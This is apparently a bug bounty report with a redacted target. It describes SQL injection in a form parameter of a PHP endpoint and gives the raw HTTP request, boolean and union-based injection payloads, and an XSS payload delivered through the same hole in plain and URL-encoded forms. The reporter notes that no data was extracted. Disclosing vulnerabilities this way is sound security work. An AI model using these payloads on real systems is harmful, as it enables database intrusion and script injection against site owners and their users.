``` POST /viewem6.php HTTP/1.1 Host: ████ User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: ru,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://████████/ Content-Type: application/x-www-form-urlencoded Content-Length: 28 Connection: close Upgrade-Insecure-Requests: 1
rememail=test&rememail2=test
Set this payload to param
rememail```
' or '1'='1
or
' or true --+
█████████
█████████
But if you set another payload
' or '1'='2
or
' or false --+
██████████ ███████
Also if you set payload
' union select 1--
You will have another request █████
I did not begin to extract any data about the server or database, since this may be contrary to the rules.
Using this payload I can execute XSS
' or '"<script>alert(1)</script>'='"<script>alert(1)</script>
You need to encode this payload
%27 or %27"<script>alert(1)</script>%27=%27"<script>alert(1)</script>
Result in Burp █████
Using this bug hacker can get access to database of server, also hacker can exploit XSS injection.